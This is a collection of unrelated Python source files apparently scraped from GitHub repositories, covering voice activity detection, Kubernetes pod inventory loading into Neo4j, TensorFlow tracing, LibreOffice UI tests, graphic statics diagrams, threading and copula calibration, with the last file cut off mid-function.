try:\n audio = torch.Tensor(audio)\n except:\n raise TypeError(\"Audio cannot be casted to tensor. Cast it manually\")\n\n if len(audio.shape) > 1:\n for i in range(len(audio.shape)): # trying to squeeze empty dimensions\n audio = audio.squeeze(0)\n if len(audio.shape) > 1:\n raise ValueError(\"More than one dimension in audio. Are you trying to process audio with 2 channels?\")\n\n if sampling_rate > 16000 and (sampling_rate % 16000 == 0):\n step = sampling_rate // 16000\n sampling_rate = 16000\n audio = audio[::step]\n warnings.warn('Sampling rate is a multiply of 16000, casting to 16000 manually!')\n else:\n step = 1\n\n if sampling_rate == 8000 and window_size_samples > 768:\n warnings.warn('window_size_samples is too big for 8000 sampling_rate! Better set window_size_samples to 256, 512 or 768 for 8000 sample rate!')\n if window_size_samples not in [256, 512, 768, 1024, 1536]:\n warnings.warn('Unusual window_size_samples! 
Supported window_size_samples:\\n - [512, 1024, 1536] for 16000 sampling_rate\\n - [256, 512, 768] for 8000 sampling_rate')\n\n model.reset_states()\n\n audio_length_samples = len(audio)\n\n speech_probs = []\n for current_start_sample in range(0, audio_length_samples, window_size_samples):\n chunk = audio[current_start_sample: current_start_sample + window_size_samples]\n if len(chunk) < window_size_samples:\n chunk = torch.nn.functional.pad(chunk, (0, int(window_size_samples - len(chunk))))\n speech_prob = model(chunk, sampling_rate).item()\n speech_probs.append(speech_prob)\n\n return speech_probs\n\n\ndef predict_file(model, path, samplerate = 16000, window_size_samples = 512):\n \n model, utils = model\n (get_speech_timestamps, _, read_audio, *_) = utils\n \n\n wav = read_audio(path, sampling_rate=samplerate)\n\n # Run model to get raw predictions / probabilities\n start_time = time.time()\n speech_probs = get_frame_scores(wav, model,\n sampling_rate=samplerate,\n window_size_samples=window_size_samples)\n end_time = time.time()\n\n predict_time_ms = (end_time-start_time) * 1000.0\n print(f'prediction time {predict_time_ms} ms')\n\n times = numpy.arange(0, len(speech_probs)) * window_size_samples/samplerate\n\n # get post-procesed speech segments\n #speech_timestamps = get_speech_timestamps(wav, model, sampling_rate=samplerate, return_seconds=True)\n\n df = pandas.DataFrame({\n 'time': times,\n 'probability': speech_probs,\n })\n return df\n\n\ndef load_model(force_reload=False):\n model, utils = torch.hub.load(repo_or_dir='snakers4/silero-vad',\n model='silero_vad',\n force_reload=force_reload)\n\n return (model, utils)\n\n\ndef parse(args=None):\n import argparse\n\n parser = argparse.ArgumentParser(description='Voice Activity Detection using Silero VAD')\n a = parser.add_argument\n\n a('input', type=str, metavar='PATH',\n help='Path to input audio file')\n\n a('--out', type=str, metavar='PATH', default=None,\n help='Path to output file. 
CSV')\n\n parsed = parser.parse_args(args)\n return parsed\n\ndef main():\n args = parse()\n\n torch.set_num_threads(1)\n\n m = load_model()\n\n probs = predict_file(m, args.input)\n out_path = args.out\n if out_path is not None:\n probs.to_csv(out_path)\n print('Wrote', out_path)\n\nif __name__ == '__main__':\n main()\n \n\n\n \n","repo_name":"jonnor/embeddedml","sub_path":"emlearn/microvad/microvad/silerovad/vad.py","file_name":"vad.py","file_ext":"py","file_size_in_byte":4855,"program_lang":"python","lang":"en","doc_type":"code","stars":139,"dataset":"github-code","pt":"52"} +{"seq_id":"32985475221","text":"import logging\nfrom typing import Dict\nfrom typing import List\n\nfrom neo4j import Session\n\nfrom cartography.intel.kubernetes.util import get_epoch\nfrom cartography.intel.kubernetes.util import K8sClient\nfrom cartography.util import timeit\n\nlogger = logging.getLogger(__name__)\n\n\n@timeit\ndef sync_pods(\n session: Session, client: K8sClient, update_tag: int, cluster: Dict,\n) -> List[Dict]:\n pods = get_pods(client, cluster)\n load_pods(session, pods, update_tag)\n return pods\n\n\n@timeit\ndef get_pods(client: K8sClient, cluster: Dict) -> List[Dict]:\n pods = list()\n for pod in client.core.list_pod_for_all_namespaces().items:\n containers = {}\n for container in pod.spec.containers:\n containers[container.name] = {\n \"name\": container.name,\n \"image\": container.image,\n \"uid\": f\"{pod.metadata.uid}-{container.name}\",\n }\n if pod.status and pod.status.container_statuses:\n for status in pod.status.container_statuses:\n if status.name in containers:\n _state = 'waiting'\n if status.state.running:\n _state = 'running'\n elif status.state.terminated:\n _state = 'terminated'\n try:\n image_sha = status.image_id.split(\"@\")[1]\n except IndexError:\n image_sha = None\n containers[status.name][\"status\"] = {\n \"image_id\": status.image_id,\n \"image_sha\": image_sha,\n \"ready\": status.ready,\n \"started\": status.started,\n \"state\": _state,\n }\n pods.append(\n {\n \"uid\": pod.metadata.uid,\n \"name\": pod.metadata.name,\n \"status_phase\": pod.status.phase,\n \"creation_timestamp\": get_epoch(pod.metadata.creation_timestamp),\n \"deletion_timestamp\": get_epoch(pod.metadata.deletion_timestamp),\n \"namespace\": pod.metadata.namespace,\n \"node\": pod.spec.node_name,\n \"cluster_uid\": cluster[\"uid\"],\n \"labels\": pod.metadata.labels,\n \"containers\": list(containers.values()),\n },\n )\n return pods\n\n\ndef load_pods(session: Session, data: List[Dict], update_tag: int) -> None:\n ingestion_cypher_query = \"\"\"\n UNWIND $pods as k8pod\n MERGE (pod:KubernetesPod {id: k8pod.uid})\n ON CREATE SET pod.firstseen = timestamp()\n SET pod.lastupdated = $update_tag,\n pod.name = k8pod.name,\n pod.status_phase = k8pod.status_phase,\n pod.created_at = k8pod.creation_timestamp,\n pod.deleted_at = k8pod.deletion_timestamp\n WITH pod, k8pod.namespace as ns, k8pod.cluster_uid as cuid, k8pod.containers as k8containers\n MATCH (cluster:KubernetesCluster {id: cuid})-[:HAS_NAMESPACE]->(space:KubernetesNamespace {name: ns})\n MERGE (space)-[rel1:HAS_POD]->(pod)\n ON CREATE SET rel1.firstseen = timestamp()\n SET rel1.lastupdated = $update_tag\n WITH pod, space, cluster, k8containers\n UNWIND k8containers as k8container\n MERGE (container: KubernetesContainer {id: k8container.uid})\n ON CREATE SET container.firstseen = timestamp()\n SET container.image = k8container.image,\n container.status_image_id = k8container.status.image_id,\n container.status_image_sha = 
k8container.status.image_sha,\n container.status_ready = k8container.status.ready,\n container.status_started = k8container.status.started,\n container.status_state = k8container.status.state,\n container.name = k8container.name,\n container.lastupdated = $update_tag\n WITH pod, space, cluster, container\n MERGE (pod)-[rel2:HAS_CONTAINER]->(container)\n ON CREATE SET rel2.firstseen = timestamp()\n SET rel2.lastupdated = $update_tag\n WITH pod, space, container\n MERGE (cluster)-[rel3:HAS_POD]->(pod)\n ON CREATE SET rel3.firstseen = timestamp()\n SET rel3.lastupdated = $update_tag\n \"\"\"\n logger.info(f\"Loading {len(data)} kubernetes pods.\")\n session.run(ingestion_cypher_query, pods=data, update_tag=update_tag)\n","repo_name":"lyft/cartography","sub_path":"cartography/intel/kubernetes/pods.py","file_name":"pods.py","file_ext":"py","file_size_in_byte":4502,"program_lang":"python","lang":"en","doc_type":"code","stars":2765,"dataset":"github-code","pt":"52"} +{"seq_id":"10128381135","text":"from __future__ import print_function\n\nimport tensorflow as tf\nfrom tensorflow.python.client import timeline\nimport socket\nhost = socket.gethostname()\n\nrun_options = tf.RunOptions(trace_level=tf.RunOptions.FULL_TRACE, output_partition_graphs=True)\nrun_metadata = tf.RunMetadata()\n\n\"\"\"\n# Basic constant operations\n# The value returned by the constructor represents the output\n# of the Constant op.\na = tf.constant(2, name=\"a\")\nb = tf.constant(3, name=\"b\")\n\n\n# Launch the default graph.\nwith tf.Session() as sess:\n print(\"a=2, b=3\")\n print(\"Addition with constants: %i\" % sess.run(a+b, options=run_options, run_metadata=run_metadata))\n print(\"Multiplication with constants: %i\" % sess.run(a*b, options=run_options, run_metadata=run_metadata))\n\n# Basic Operations with variable as graph input\n# The value returned by the constructor represents the output\n# of the Variable op. (define as input when running session)\n# tf Graph input\na = tf.placeholder(tf.int16, name=\"a\")\nb = tf.placeholder(tf.int16, name=\"b\")\n\n# Define some operations\nadd = tf.add(a, b, \"add\")\nmul = tf.multiply(a, b, \"mul\")\n\n# Launch the default graph.\nwith tf.Session() as sess:\n # Run every operation with variable input\n print(\"Addition with variables: %i\" % sess.run(add, feed_dict={a: 2, b: 3}, options=run_options, run_metadata=run_metadata))\n print(\"Multiplication with variables: %i\" % sess.run(mul, feed_dict={a: 2, b: 3}, options=run_options, run_metadata=run_metadata))\n\n\"\"\"\n\n# ----------------\n# More in details:\n# Matrix Multiplication from TensorFlow official tutorial\n\na = tf.placeholder(tf.int32, name=\"a\", shape=(1,1))\nb = tf.placeholder(tf.int32, name=\"b\", shape=(1,1))\n\n# Create a Matmul op that takes 'matrix1' and 'matrix2' as inputs.\n# The returned value, 'product', represents the result of the matrix\n# multiplication.\nproduct = tf.matmul(a, b)\n\n# To run the matmul op we call the session 'run()' method, passing 'product'\n# which represents the output of the matmul op. This indicates to the call\n# that we want to get the output of the matmul op back.\n#\n# All inputs needed by the op are run automatically by the session. 
They\n# typically are run in parallel.\n#\n# The call 'run(product)' thus causes the execution of threes ops in the\n# graph: the two constants and matmul.\n#\n# The output of the op is returned in 'result' as a numpy `ndarray` object.\nwith tf.Session() as sess:\n result = sess.run(product, feed_dict={a: [[1.]], b: [[10.]]}, options=run_options, run_metadata=run_metadata)\n print(result)\n # ==> [[ 12.]]\n\n\n\"\"\"\n# ----------------\n# More in details:\n# Matrix Multiplication from TensorFlow official tutorial\n\n# Create a Constant op that produces a 1x2 matrix. The op is\n# added as a node to the default graph.\n#\n# The value returned by the constructor represents the output\n# of the Constant op.\nmatrix1 = tf.constant([[3., 3.]])\n\n# Create another Constant that produces a 2x1 matrix.\nmatrix2 = tf.constant([[2.],[2.]])\n\n# Create a Matmul op that takes 'matrix1' and 'matrix2' as inputs.\n# The returned value, 'product', represents the result of the matrix\n# multiplication.\nproduct = tf.matmul(matrix1, matrix2)\n\n# To run the matmul op we call the session 'run()' method, passing 'product'\n# which represents the output of the matmul op. This indicates to the call\n# that we want to get the output of the matmul op back.\n#\n# All inputs needed by the op are run automatically by the session. They\n# typically are run in parallel.\n#\n# The call 'run(product)' thus causes the execution of threes ops in the\n# graph: the two constants and matmul.\n#\n# The output of the op is returned in 'result' as a numpy `ndarray` object.\nwith tf.Session() as sess:\n result = sess.run(product, options=run_options, run_metadata=run_metadata)\n print(result)\n # ==> [[ 12.]]\n\"\"\"\n\n# Create the Timeline object, and write it to a json\ntl = timeline.Timeline(run_metadata.step_stats)\nctf = tl.generate_chrome_trace_format(show_memory=True)\nsess.close()\nwith open('trace_' + __file__[:-3] + \"_\" + host + '.json', 'w') as f:\n f.write(ctf)\n","repo_name":"pzins/dorsal","sub_path":"old_files/basic_operations.py","file_name":"basic_operations.py","file_ext":"py","file_size_in_byte":4071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"29169998050","text":"# -*- tab-width: 4; indent-tabs-mode: nil; py-indent-offset: 4 -*-\n#\n# This file is part of the LibreOffice project.\n#\n# This Source Code Form is subject to the terms of the Mozilla Public\n# License, v. 2.0. 
If a copy of the MPL was not distributed with this\n# file, You can obtain one at http://mozilla.org/MPL/2.0/.\n#\n\nfrom uitest.framework import UITestCase\nfrom uitest.uihelper.common import get_state_as_dict\nfrom uitest.uihelper.common import type_text\nfrom libreoffice.uno.propertyvalue import mkPropertyValues\nfrom org.libreoffice.unotest import systemPathToFileUrl\nfrom tempfile import TemporaryDirectory\nimport os.path\n\nclass edit_file_properties_before_saving(UITestCase):\n\n def change_doc_info_setting(self, enabled):\n with self.ui_test.execute_dialog_through_command(\".uno:OptionsTreeDialog\") as xDialog:\n xPages = xDialog.getChild(\"pages\")\n xLoadSaveEntry = xPages.getChild('1')\n xLoadSaveEntry.executeAction(\"EXPAND\", tuple())\n xGeneralEntry = xLoadSaveEntry.getChild('0')\n xGeneralEntry.executeAction(\"SELECT\", tuple())\n\n xDocInfo = xDialog.getChild(\"docinfo\")\n if get_state_as_dict(xDocInfo)['Selected'] != enabled:\n xDocInfo.executeAction(\"CLICK\", tuple())\n self.assertEqual(enabled, get_state_as_dict(xDocInfo)['Selected'])\n\n def test_tdf117895(self):\n\n with TemporaryDirectory() as tempdir:\n xFilePath = os.path.join(tempdir, \"tdf117895-temp.odt\")\n\n try:\n self.change_doc_info_setting(\"true\")\n\n with self.ui_test.create_doc_in_start_center(\"writer\"):\n\n # Save Copy as\n with self.ui_test.execute_dialog_through_command('.uno:SaveAs', close_button=\"\") as xDialog:\n xFileName = xDialog.getChild('file_name')\n xFileName.executeAction('TYPE', mkPropertyValues({'KEYCODE':'CTRL+A'}))\n xFileName.executeAction('TYPE', mkPropertyValues({'KEYCODE':'BACKSPACE'}))\n xFileName.executeAction('TYPE', mkPropertyValues({'TEXT': xFilePath}))\n\n xOpen = xDialog.getChild(\"open\")\n with self.ui_test.execute_dialog_through_action(xOpen, \"CLICK\") as xPropertiesDialog:\n xReadOnly = xPropertiesDialog.getChild(\"readonly\")\n xReadOnly.executeAction(\"CLICK\", tuple())\n self.assertEqual(\"true\", get_state_as_dict(xReadOnly)['Selected'])\n\n with self.ui_test.load_file(systemPathToFileUrl(xFilePath)) as doc2:\n # Without the fix in place, this test would have failed here\n self.assertTrue(doc2.isReadonly())\n finally:\n # Put this setting back to false, otherwise it might affect other tests\n self.change_doc_info_setting(\"false\")\n\n def test_tdf119206(self):\n\n with TemporaryDirectory() as tempdir:\n xFilePath = os.path.join(tempdir, \"tdf119206-temp.odt\")\n\n try:\n self.change_doc_info_setting(\"true\")\n\n with self.ui_test.create_doc_in_start_center(\"writer\"):\n\n xWriterDoc = self.xUITest.getTopFocusWindow()\n xWriterEdit = xWriterDoc.getChild(\"writer_edit\")\n type_text(xWriterEdit, \"XXXX\")\n\n # Close document and save\n with self.ui_test.execute_dialog_through_command('.uno:CloseDoc', close_button=\"\") as xConfirmationDialog:\n xSave = xConfirmationDialog.getChild(\"save\")\n\n with self.ui_test.execute_dialog_through_action(xSave, \"CLICK\", close_button=\"\") as xDialog:\n xFileName = xDialog.getChild('file_name')\n xFileName.executeAction('TYPE', mkPropertyValues({'KEYCODE':'CTRL+A'}))\n xFileName.executeAction('TYPE', mkPropertyValues({'KEYCODE':'BACKSPACE'}))\n xFileName.executeAction('TYPE', mkPropertyValues({'TEXT': xFilePath}))\n\n xOpen = xDialog.getChild(\"open\")\n with self.ui_test.execute_dialog_through_action(xOpen, \"CLICK\") as xPropertiesDialog:\n # Without the fix in place, this test would have crashed here\n xReadOnly = xPropertiesDialog.getChild(\"readonly\")\n xReadOnly.executeAction(\"CLICK\", tuple())\n 
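# The CLICK above ticks the read-only checkbox in the file-properties dialog; confirm it registered:\n 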
self.assertEqual(\"true\", get_state_as_dict(xReadOnly)['Selected'])\n\n with self.ui_test.load_file(systemPathToFileUrl(xFilePath)) as doc2:\n self.assertTrue(doc2.isReadonly())\n\n finally:\n # Put this setting back to false, otherwise it might affect other tests\n self.change_doc_info_setting(\"false\")\n\n# vim: set shiftwidth=4 softtabstop=4 expandtab:\n","repo_name":"LibreOffice/core","sub_path":"sw/qa/uitest/writer_tests6/edit_file_properties_before_saving.py","file_name":"edit_file_properties_before_saving.py","file_ext":"py","file_size_in_byte":5039,"program_lang":"python","lang":"en","doc_type":"code","stars":2194,"dataset":"github-code","pt":"52"} +{"seq_id":"11170756306","text":"from __future__ import print_function\nfrom __future__ import absolute_import\nfrom __future__ import division\n\nfrom compas.datastructures import mesh_dual\nfrom compas_ags.diagrams import Diagram\nfrom compas.geometry import Line\n\n\n__all__ = [\"ForceDiagram\"]\n\n\nclass ForceDiagram(Diagram):\n \"\"\"Mesh-based data structure for force diagrams in AGS.\"\"\"\n\n def __init__(self):\n super(ForceDiagram, self).__init__()\n self.attributes.update({\"name\": \"Force\"})\n self.update_default_vertex_attributes({\"is_fixed\": False, \"line_constraint\": None, \"is_param\": False})\n self.update_default_edge_attributes({\"l\": 0.0, \"target_vector\": None})\n\n # --------------------------------------------------------------------------\n # Constructors\n # --------------------------------------------------------------------------\n\n @classmethod\n def from_formdiagram(cls, formdiagram):\n \"\"\"Construct a force diagram from a form diagram.\n\n Parameters\n ----------\n formdiagram : :class:`compas_tna.diagrams.FormDiagram`\n The form diagram.\n\n Returns\n -------\n :class:`compas_ags.diagrams.ForceDiagram`\n \"\"\"\n forcediagram = mesh_dual(formdiagram, cls)\n forcediagram.dual = formdiagram\n formdiagram.dual = forcediagram\n return forcediagram\n\n # --------------------------------------------------------------------------\n # Convenience functions for retrieving attributes of the force diagram.\n # --------------------------------------------------------------------------\n\n def xy(self):\n \"\"\"The XY coordinates of the vertices.\n\n Returns\n -------\n list\n \"\"\"\n return self.vertices_attributes(\"xy\")\n\n def fixed(self):\n \"\"\"The identifiers of the fixed vertices.\n\n Returns\n -------\n list\n \"\"\"\n return list(self.vertices_where({\"is_fixed\": True}))\n\n def anchor(self):\n \"\"\"Get an anchor to the force diagram.\n\n Returns\n -------\n int\n \"\"\"\n return next(self.vertices())\n\n # --------------------------------------------------------------------------\n # Helpers\n # --------------------------------------------------------------------------\n\n def edges_where_dual(self, conditions, data=False):\n \"\"\"Get edges for which a certain condition or set of conditions is true for the corresponding edges in the diagram's dual.\n\n Parameters\n ----------\n conditions : dict\n A set of conditions in the form of key-value pairs.\n The keys should be attribute names. 
The values can be attribute\n values or ranges of attribute values in the form of min/max pairs.\n data : bool, optional\n Yield the edges and their data attributes.\n Default is ``False``.\n\n Yields\n ------\n 2-tuple\n The next edge as a (u, v) tuple, if ``data=False``.\n The next edge as a ((u, v), data) tuple, if ``data=True``.\n\n Examples\n --------\n >>>\n\n \"\"\"\n for edge in list(self.edges()):\n is_match = True\n\n dual_edge = self.dual_edge(edge)\n dual_edge_attr = self.dual.edge_attributes(dual_edge)\n\n for cond_name, cond_value in conditions.items():\n dual_method = getattr(self.dual, cond_name, None)\n\n if dual_method and callable(dual_method):\n dual_value = dual_method(dual_edge)\n elif cond_name in dual_edge_attr:\n dual_value = dual_edge_attr[cond_name]\n else:\n is_match = False\n break\n\n if isinstance(dual_value, list):\n if cond_value not in dual_value:\n is_match = False\n break\n elif isinstance(cond_value, (tuple, list)):\n minval, maxval = cond_value\n if dual_value < minval or dual_value > maxval:\n is_match = False\n break\n else:\n if cond_value != dual_value:\n is_match = False\n break\n\n if is_match:\n if data:\n yield edge, self.edge_attributes(edge)\n else:\n yield edge\n\n def dual_edge(self, edge):\n \"\"\"Find the cooresponding edge in the diagram's dual.\n\n Parameters\n ----------\n edge : tuple of int\n The edge identifier.\n\n Returns\n -------\n tuple (int, int) or None\n The identifier of the dual edge if it exists.\n \"\"\"\n for u, v in self.dual.face_halfedges(edge[0]):\n if self.dual.halfedge[v][u] == edge[1]:\n if self.dual.has_edge((u, v)):\n return u, v\n return v, u\n\n def is_dual_edge_external(self, edge):\n \"\"\"Verify if the corresponding edge in the diagram's dual is marked as \"external\".\n\n Parameters\n ----------\n edge : tuple of int\n The edge identifier.\n\n Returns\n -------\n bool\n \"\"\"\n return self.dual.edge_attribute(self.dual_edge(edge), \"is_external\")\n\n def is_dual_edge_reaction(self, edge):\n \"\"\"Verify if the corresponding edge in the diagram's dual is marked as \"reaction\".\n\n Parameters\n ----------\n edge : tuple of int\n The edge identifier.\n\n Returns\n -------\n bool\n \"\"\"\n return self.dual.edge_attribute(self.dual_edge(edge), \"is_reaction\")\n\n def is_dual_edge_load(self, edge):\n \"\"\"Verify if the corresponding edge in the diagram's dual is marked as \"load\".\n\n Parameters\n ----------\n edge : tuple of int\n The edge identifier.\n\n Returns\n -------\n bool\n \"\"\"\n return self.dual.edge_attribute(self.dual_edge(edge), \"is_load\")\n\n def is_dual_edge_ind(self, edge):\n \"\"\"Verify if the corresponding edge in the diagram's dual is marked as \"independent\".\n\n Parameters\n ----------\n edge : tuple of int\n The edge identifier.\n\n Returns\n -------\n bool\n \"\"\"\n return self.dual.edge_attribute(self.dual_edge(edge), \"is_ind\")\n\n def dual_edge_force(self, edge):\n \"\"\"Retrieve the force in the corresponding edge of the diagram's dual.\n\n Parameters\n ----------\n edge : tuple(int, int)\n The edge identifier.\n\n Returns\n -------\n float\n \"\"\"\n return self.dual.edge_attribute(self.dual_edge(edge), \"f\")\n\n def dual_edge_angledeviation(self, edge):\n \"\"\"Retrieve the angle deviation in the corresponding edge of the diagram's dual.\n\n Parameters\n ----------\n edge : tuple(int, int)\n The edge identifier.\n\n Returns\n -------\n float\n \"\"\"\n return self.dual.edge_attribute(self.dual_edge(edge), \"a\")\n\n def dual_edge_targetforce(self, edge):\n 
\"\"\"Retrieve the target force in the corresponding edge of the diagram's dual.\n\n Parameters\n ----------\n edge : tuple(int, int)\n The edge identifier.\n\n Returns\n -------\n float\n \"\"\"\n return self.dual.edge_attribute(self.dual_edge(edge), \"target_force\")\n\n def edge_index(self, form=None):\n \"\"\"Construct a mapping between the identifiers of edges and the corresponding indices in a list of edges.\n\n Parameters\n ----------\n form : :class:`compas_ags.diagrams.FormDiagram`, optional\n If a form diagra is provided as reference, the list of edges is ordered such that it corresponds\n to the natural ordering of edges in the form diagram.\n\n Returns\n -------\n dict\n Mapping between edge identifiers and the correpsonding indices of the edges in a list.\n\n \"\"\"\n if not form:\n return {edge: index for index, edge in enumerate(self.edges())}\n edge_index = dict()\n for index, (u, v) in enumerate(form.edges()):\n f1 = form.halfedge[u][v]\n f2 = form.halfedge[v][u]\n edge_index[f1, f2] = index\n # the weird side-effect of this is that edges get rotated if necessary\n return edge_index\n\n def ordered_edges(self, form):\n \"\"\" \"Construct a list of edges with the same order as the corresponding edges of the form diagram.\n\n Parameters\n ----------\n form : :class:`compas_ags.diagrams.FormDiagram`\n\n Returns\n -------\n list\n \"\"\"\n edge_index = self.edge_index(form=form)\n index_edge = {index: edge for edge, index in edge_index.items()}\n edges = [index_edge[index] for index in range(self.number_of_edges())]\n return edges\n\n # --------------------------------------------------------------------------\n # Helpers\n # --------------------------------------------------------------------------\n\n def constraints_from_dual(self, tol=10e-4):\n \"\"\" \"Reflect constraints from the form diagram in the force diagram.\n\n Returns\n -------\n ForceDiagram is modified in place.\n \"\"\"\n edge_index = self.dual.edge_index()\n ordered_edges = self.ordered_edges(self.dual)\n edges_orient = []\n\n for edge in self.edges_where_dual({\"is_ind\": True}): # Fix vertices of dual independent edge\n self.vertices_attribute(\"is_fixed\", True, keys=edge)\n edges_orient.append(edge)\n\n for edge in self.edges_where_dual(\n {\"is_load\": True}\n ): # If loads are orthogonal the force dual edge gets constrained\n self.edge_attribute(edge, \"is_load\", True)\n edges_orient.append(edge)\n sp, ep = self.edge_coordinates(*edge)\n line = Line(sp, ep)\n self.vertices_attribute(\"line_constraint\", value=line, keys=edge)\n\n for edge in self.edges_where_dual({\"is_reaction\": True}):\n self.edge_attribute(edge, \"is_reaction\", True)\n edges_orient.append(edge)\n\n for form_edge in self.dual.edges():\n target_vector = self.dual.edge_attribute(form_edge, \"target_vector\")\n index = edge_index[form_edge]\n force_edge = ordered_edges[index]\n if target_vector is not None:\n edges_orient.append(force_edge)\n\n for edge in edges_orient:\n edge = edge if edge in list(self.edges()) else (edge[1], edge[0])\n sp, ep = self.edge_coordinates(*edge)\n dx = ep[0] - sp[0]\n dy = ep[1] - sp[1]\n length = (dx**2 + dy**2) ** 0.5\n self.edge_attribute(edge, \"target_vector\", [dx / length, dy / length])\n\n # def compute_constraints(self, form, M):\n # r\"\"\"Computes the form diagram constraints used\n # in compas_bi_ags.bi_ags.graphstatics.form_update_from_force_direct\n\n # Parameters\n # ----------\n # form : compas_ags.diagrams.formdiagram.FormDiagram\n # The form diagram to update.\n # M\n # The matrix 
described in compas_bi_ags.bi_ags.graphstatics.form_update_from_force_direct\n # \"\"\"\n # import numpy as np\n # nr_col_jac = M.shape[1]\n # constraint_rows = np.zeros((0, M.shape[1]))\n # residual = np.zeros((0, 1))\n # vcount = form.number_of_vertices()\n\n # # Currently this computes two constraints per fixed vertex in the form diagram.\n # for i, (key, attr) in enumerate(form.vertices(True)):\n # if not attr['is_fixed']:\n # continue\n\n # # Handle x\n # constraint_jac_row = np.zeros(\n # (1, nr_col_jac)) # Added row for jacobian\n # # Lock horizontal position\n # constraint_jac_row[0, i] = 1\n # constraint_rows = np.vstack((constraint_rows, constraint_jac_row))\n # residual = np.vstack((residual, attr['x']))\n\n # # Handle y\n # constraint_jac_row = np.zeros(\n # (1, nr_col_jac)) # Added row for jacobian\n # # Lock horizontal position\n # constraint_jac_row[0, i+vcount] = 1\n # constraint_rows = np.vstack((constraint_rows, constraint_jac_row))\n # residual = np.vstack((residual, attr['y']))\n # return constraint_rows, residual\n\n\n# ==============================================================================\n# Main\n# ==============================================================================\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"BlockResearchGroup/compas_ags","sub_path":"src/compas_ags/diagrams/forcediagram.py","file_name":"forcediagram.py","file_ext":"py","file_size_in_byte":12845,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"52"} +{"seq_id":"74100782565","text":"#https://stackoverflow.com/questions/2846653/how-to-use-threading-in-python\r\n\r\nimport os\r\nimport sys\r\nimport math\r\nimport threading\r\n\r\nclass SummingThread(threading.Thread):\r\n def __init__(self,low,high):\r\n super(SummingThread, self).__init__()\r\n self.low=low\r\n self.high=high\r\n self.total=0\r\n\r\n def run(self):\r\n for i in range(self.low,self.high):\r\n self.total+=i\r\n print(self.total)\r\n\r\n\r\nclass Main_Thread(threading.Thread):\r\n result = 0\r\n \r\n def __init__(self,low,high):\r\n super(Main_Thread, self).__init__()\r\n self.low = low\r\n self.high = high\r\n\r\n def run(self):\r\n thread1 = SummingThread(self.low,self.high)\r\n thread2 = SummingThread(self.high,(self.high*2)+1)\r\n thread1.start() # This actually causes the thread to run\r\n thread2.start()\r\n thread1.join()\r\n thread2.join()\r\n print(thread1.total,thread2.total)\r\n print(\"\\n\")\r\n # At this point, both threads have completed\r\n self.result = thread1.total + thread2.total\r\n \r\n \r\n\r\nmt = Main_Thread(0,5)\r\nmt.start()\r\nprint(mt.result)\r\nmt.join()\r\n\r\n \r\n","repo_name":"e-Yantra-OpenSource/3day-workshop","sub_path":"Python/threadexample.py","file_name":"threadexample.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"52"} +{"seq_id":"33402374197","text":"import re\n\nGREEN = '\\033[32m'\nENDC = '\\033[0m'\n\ndef getFormattedResponseText(response): \n formattedResponse = ''\n substrings = re.split('(```.*?```)', response, flags=re.DOTALL)\n\n for substring in substrings:\n substr = substring\n if substr.startswith('```'):\n substr = GREEN + substring + ENDC\n \n formattedResponse = formattedResponse + substr\n\n return 
formattedResponse","repo_name":"mattinordstrom/gptcli","sub_path":"src/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"12680879182","text":"import math\nimport numpy\nfrom scipy.stats import norm, kendalltau, t\nfrom scipy.special import gammaln, gamma\n\nfrom distribution import EmpiricalDistribution\nfrom copula import GaussianCopula, StudentTCopula\n\n\n\ndef returns(adjusted_prices):\n dimension, no_of_observations = adjusted_prices.shape\n returns = numpy.zeros((dimension, no_of_observations - 1))\n for i in xrange(dimension):\n for j in xrange(1, no_of_observations):\n returns[i, j-1] = math.log(adjusted_prices[i, j]/adjusted_prices[i, j-1])\n return returns\n\n\ndef transformed_variates(observations):\n dimension, no_of_observations = observations.shape\n variates = numpy.zeros((dimension, no_of_observations))\n for i in xrange(dimension):\n marginal = EmpiricalDistribution(observations[i])\n for j in xrange(no_of_observations):\n variates[i, j] = norm.ppf(marginal.cdf(observations[i, j]))\n return variates\n\n\ndef uniform_variates(observations):\n dimension, no_of_observations = observations.shape\n variates = numpy.zeros((dimension, no_of_observations))\n for i in xrange(dimension):\n marginal = EmpiricalDistribution(observations[i])\n for j in xrange(no_of_observations):\n variates[i, j] = marginal.cdf(observations[i, j])\n return variates\n\ndef transformedTVariates(observations):\n dimension, noOfObservations = observations.shape\n variates = numpy.zeros((dimension, noOfObservations))\n for i in xrange(dimension):\n marginal = EmpiricalDistribution(observations[i])\n for j in xrange(noOfObservations):\n variates[i, j] = marginal.cdf(observations[i, j])\n return variates\n\nclass GaussianCalibrator(object):\n\n def calibrate(self, adjustedPrices):\n return self.calibrate_from_returns(returns(adjustedPrices))\n\n def calibrate_from_returns(self, returns):\n return self.calibrate_from_variates(transformed_variates(returns))\n\n def calibrate_from_variates(self, variates):\n dimension, no_of_observations = variates.shape\n covariance = numpy.zeros((dimension, dimension))\n for i in xrange(dimension):\n for j in xrange(i+1):\n tot = 0.0\n for k in xrange(no_of_observations):\n tot += variates[i, k]*variates[j, k]\n covariance[i, j] = tot/no_of_observations\n covariance[j, i] = covariance[i, j]\n return GaussianCopula(covariance)\n\n\nclass StudentTCalibrator(object):\n MAXIMUM_NU_VALUE = 10.0\n DELTA = 0.2\n\n def __init__(self, maximumNuValue, delta):\n self.maximumNuValue = maximumNuValue\n self.delta = delta\n\n def calibrate(self, adjustedPrices):\n return self.calibrateFromReturns(returns(adjustedPrices))\n\n def calibrateFromReturns(self, returns):\n return self.calibrateFromVariates(transformedTVariates(returns))\n\n def calibrateFromVariates(self, variates):\n dimension, noOfObservations = variates.shape\n covarianceData = self.covariance(variates)\n sigma = numpy.array(covarianceData)\n nu = self.optimalNu(variates, sigma, covarianceData)\n return StudentTCopula(covarianceData, nu)\n\n def covariance(self, variates):\n dimension, noOfObservations = variates.shape\n covarianceData = numpy.zeros([dimension, dimension])\n for i in xrange(dimension):\n for j in xrange(i + 1):\n tau, pv = kendalltau(variates[i], variates[j])\n covarianceData[i, j] = math.sin(math.pi/2.0 * tau)\n covarianceData[j, i] = covarianceData[i, j]\n return 
